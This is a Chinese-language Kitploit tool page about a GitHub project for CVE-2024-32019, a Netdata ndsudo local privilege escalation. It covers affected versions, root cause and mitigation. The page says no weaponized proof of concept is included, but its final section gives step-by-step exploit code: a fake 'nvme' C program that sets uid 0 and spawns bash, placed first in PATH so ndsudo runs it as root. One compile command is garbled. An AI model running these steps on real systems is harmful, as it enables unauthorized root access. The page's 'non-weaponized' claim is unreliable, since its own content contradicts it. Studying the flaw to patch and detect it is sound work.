Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2024-32019-PoC — CVE-2024-32019 的非武器化 PoC 与检查器,该漏洞是 Netdata 的 ndsudo 辅助程序中的本地权限提升漏洞。评估暴露面、验证补丁,并理解基于 PATH 的利用向量。 | Kitploit
工具/GitHubGitHub/sphyos/cve-2024-32019-poc
权限提升漏洞分析漏洞利用渗透测试学习与教育实验室与实践
GitHubsphyos/cve-2024-32019-poc

cve-2024-32019-PoC

CVE-2024-32019 的非武器化 PoC 与检查器,该漏洞是 Netdata 的 ndsudo 辅助程序中的本地权限提升漏洞。评估暴露面、验证补丁,并理解基于 PATH 的利用向量。

查看仓库
21年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-32019 — Netdata ndsudo 本地权限提升

摘要

Netdata 的 ndsudo 辅助程序(安装时为 setuid root)限制它可以运行的命令,但使用调用者的 PATH 来解析这些命令。在受影响版本中,本地用户可以将恶意二进制文件放在 PATH 中更靠前的位置,并让 ndsudo 以 root 权限执行它。已在 Netdata 1.45.3 和 1.45.0-169 中修补。

受影响 / 已修补

  • 受影响: >= 1.44.0-60, < 1.45.0-169 和 >= 1.45.0, < 1.45.3(根据上游公告)。

  • 已修复: 1.45.3(稳定版)、1.45.0-169(夜间版)。GitHub

影响

在安装了 SUID ndsudo 且用户可调用它的系统上(通常是 netdata 组成员),可实现本地权限提升至 root。NVDGitHub

根本原因(概要)

  • ndsudo 是 SUID-root 程序,并白名单允许 nvme-list、nvme-smart-log 等子命令。

  • 它按名称调用外部可执行文件(例如 nvme),这些文件通过 PATH 解析,而不是使用绝对路径或固定安全的搜索路径。

  • 如果可写目录出现在系统路径之前,攻击者可以引入一个仿冒二进制文件,从而以 root 身份执行。GitHub

安全复现 / 验证

此仓库包含非利用型检查工具,它们:

  • 检查 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo(或实际安装位置)的 SUID/所有权。

  • 枚举 PATH 中位于常见系统路径之前的可写目录。

  • 确认存在 ndsudo 可能尝试执行的已列入白名单的子命令名称。

  • (可选)运行 ndsudo --test <subcommand> 来打印解析后的命令而不实际执行(请谨慎使用,先阅读代码)。GitHub

⚠️ 不包含武器化 PoC。本项目供防御者和研究人员负责任地评估暴露风险并验证补丁。

缓解措施

  • 升级 Netdata 至 1.45.3(稳定版)或 1.45.0-169(夜间版)。

  • 作为纵深防御措施,建议在 SUID 辅助程序中使用绝对路径或经过清理的最小 PATH;避免授予不必要的 ndsudo 访问权限。GitHubwiz.io

利用步骤

1. 将以下 C 代码保存为 nvme.c:
root@kitploit:~
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
2. 编译利用代码
root@kitploit:~
gcc nvme.c - nvme
3. 环境设置
root@kitploit:~
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
4. 修改 PATH
root@kitploit:~
export PATH=/tmp/fakebin:$PATH
5. 利用命令
root@kitploit:~
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

参考资料

  • NVD:CVE-2024-32019。NVD

  • Netdata 公告(GHSA-pmhq-4cxq-wj93)。GitHub

  • Wiz 摘要。wiz.io

  • Snyk 文章。漏洞指南

  • MITRE/CVE 列表。CVE

下载工具